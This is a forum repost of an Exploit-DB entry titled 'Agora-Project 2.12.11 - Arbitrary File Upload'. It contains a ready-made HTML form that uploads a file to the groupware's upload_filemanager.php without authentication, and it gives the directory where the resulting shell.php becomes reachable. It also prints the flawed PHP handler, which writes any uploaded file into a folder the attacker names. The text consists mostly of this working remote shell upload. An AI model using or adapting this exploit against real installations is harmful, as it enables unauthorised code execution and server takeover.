Exploit Agora-Project 2.12.11 - Arbitrary File Upload

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
19059
Проверка EDB
  1. Пройдено
Автор
MISA3L
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
null
Дата публикации
2012-06-11
PHP:
# Exploit Title: agora-project_2.12.11_12-2011 Remote Shell Upload
# Google Dork: n0 N0obs
# Date: 10/06/2012
# Exploit Author: Misa3l
# Vendor Homepage: http://sourceforge.net/projects/agora-project/
# Software Link: http://sourceforge.net/projects/agora-project/files/latest/download
# Version: 2.12.11_12-2011
# Tested on: Debian 6.0

Description

Agora-Project is an intuitive groupware under GPL (Based on PHP/MySQL). It contains many modules: File Manager (with versioning), Calendars (with resource calendars), Task Manager, Bookmark manager, Contacts, News, Forum, Instant Messaging, etc.

Exploit

**********************************************************************************

<form action="http://127.0.0.1/labs/module_fichier/upload/upload_filemanager.php?dossierup=testing" ENCTYPE="multipart/form-data" method="post">
<input type="file" name="dossierup" />
<input type="submit" name="sube" />
</form>

**********************************************************************************

Dir Shell:
http://127.0.0.1/labs/stock_fichiers/tmp/  
"testing" <--- folder 
"shell.php" <--- shell
File Vul:
module_fichier/upload/upload_filemanager.php

<?php
////    INIT
define("ROOT_PATH","../../");
require_once ROOT_PATH."includes/global.inc.php";

////    AJOUTE LES FICHIERS UPLOADES AVEC PLUPLOAD DANS UN DOSSIER TEMPORAIRE
////
if(@$_GET["dossierup"]!="" && isset($_FILES) && count($_FILES)>0)
{
    ////    DOSSIER TEMPORAIRE  (Cr�� si inexistant + chmod (car s'il est pass� dans mkdir() �a marche pas!))
    $save_path = PATH_TMP.$_GET["dossierup"];
    if(is_dir($save_path)==false)    { mkdir($save_path);  chmod($save_path, 0775); }
    
    ////    PLACE LE/LES FICHIERS
    foreach($_FILES as $file_tmp)
    {
        if($file_tmp["error"]==0 && is_writable($save_path))    { move_uploaded_file($file_tmp["tmp_name"], $save_path."/".$file_tmp["name"]); }
        elseif($num_erreur==4)                                    { echo "UPLOAD_ERR_NO_FILE"; }
        else                                                    { echo $trad["MSG_ALERTE_taille_fichier"]; }
    }
}
?>

***************************************************************************************
End... Misa3l From Venezuela
 
Источник
www.exploit-db.com

Похожие темы